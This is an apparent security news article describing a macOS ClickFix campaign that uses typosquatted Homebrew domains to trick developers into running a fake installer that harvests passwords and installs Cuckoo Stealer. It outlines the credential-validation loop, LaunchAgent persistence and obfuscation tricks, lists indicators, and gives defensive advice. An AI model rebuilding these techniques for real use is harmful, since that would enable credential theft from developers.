ClickFix Exploits Homebrew Workflow to Deploy Cuckoo Stealer on macOS
A sophisticated social engineering campaign has emerged, targeting macOS developers by exploiting the trusted Homebrew package management system. This attack employs the ClickFix technique to deceive users into executing malicious Terminal commands, leading to the deployment of Cuckoo Stealer—a credential-harvesting malware.
Deceptive Tactics and Execution
The attackers have registered typosquatted domains that closely mimic the official Homebrew website. Developers visiting these fraudulent pages encounter what appears to be a standard installation command, complete with a convenient copy button. The malicious command subtly replaces the legitimate domain `raw.githubusercontent.com` with `raw.homabrews.org`, a change that can easily go unnoticed.
Upon execution, the script initiates a continuous password prompt loop using macOS Directory Services, ensuring that attackers obtain valid credentials before proceeding to the next stage. This method effectively exploits user trust and familiarity with standard installation procedures.
Infrastructure and Domain Analysis
Security analysts identified this campaign after discovering the typosquatted domain `homabrews.org`, registered on January 13, 2026. Further investigation revealed six interconnected domains hosted on shared infrastructure at IP address 5.255.123.244, with the earliest certificates dating back to July 2025. The domains employ various typosquatting techniques, including character omission, double-letter substitution, and alternative top-level domains, to enhance their deceptive effectiveness.
Technical Infection Workflow
The attack unfolds in two distinct stages:
1. Credential Harvesting: The initial script masquerades as a legitimate Homebrew installer while secretly validating user passwords through the `dscl authonly` command. It displays Sorry, try again for incorrect passwords, mimicking standard `sudo` behavior to avoid suspicion. Once valid credentials are captured, the script downloads a binary named `brew_agent`, encoding the stolen password in Base64 format and passing it as an argument for immediate access to protected system resources.
2. Malware Deployment: Cuckoo Stealer establishes persistence through the macOS LaunchAgent system, disguising itself as `com.homebrew.brewupdater.plist` to blend with legitimate system processes. The malware implements multiple anti-analysis techniques, including locale-based filtering that prevents execution on systems configured for Commonwealth of Independent States countries, specifically blocking Armenian, Belarusian, Kazakh, Russian, and Ukrainian locales. Additionally, all sensitive strings are encrypted using XOR-based obfuscation with index-based key rotation to evade static analysis and signature detection.
Implications and Recommendations
This campaign underscores the evolving sophistication of social engineering attacks targeting developers. By exploiting trusted workflows and subtle domain alterations, attackers can effectively deceive users into compromising their systems.
To mitigate such threats, developers and users are advised to:
– Verify Domains Carefully: Always double-check URLs for subtle misspellings or unusual domain names before executing any commands.
– Avoid Blindly Copying Commands: Refrain from copying and executing commands from unverified sources, even if they appear legitimate.
– Implement Multi-Factor Authentication (MFA): Enhance security by requiring multiple forms of verification before granting access to sensitive systems.
– Stay Informed: Regularly update yourself on emerging threats and attack vectors targeting your specific development environment.
By adopting these practices, developers can better protect themselves against deceptive campaigns like ClickFix and maintain the integrity of their systems.
